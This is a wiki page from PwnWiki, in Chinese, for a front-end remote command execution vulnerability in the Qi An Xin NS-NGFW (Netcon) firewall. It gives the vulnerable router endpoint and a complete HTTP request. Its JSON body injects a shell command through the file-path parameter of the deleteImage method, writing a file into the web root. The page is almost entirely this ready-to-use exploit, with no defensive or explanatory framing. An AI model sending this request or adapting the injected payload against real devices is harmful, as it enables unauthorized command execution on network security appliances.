奇安信NS-NGFW 網康防火牆前臺RCE漏洞

From PwnWiki
Revision as of 12:54, 11 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 漏洞位置: <pre> http://xx.xx.xx.xx/directdata/direct/router </pre> ===RequestHeader=== <pre> Host: X.X.X.X User-Agent: Mozilla/5.0 (Macintosh; Intel M...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

漏洞位置: 

http://xx.xx.xx.xx/directdata/direct/router

RequestHeader

Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 155
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip


RequestBody

{
    "action": "SSLVPN_Resource",
    "method": "deleteImage",
    "data":[{
    	"data":["/var/www/html/b.txt;echo'fa3a6469'>/var/www/html/fa3a6.txt"]
    }],
    "type": "rpc",
    "tid": 17

}
Retrieved from "https://pwnwiki.com/index.php?title=奇安信NS-NGFW_網康防火牆前臺RCE漏洞&oldid=1534"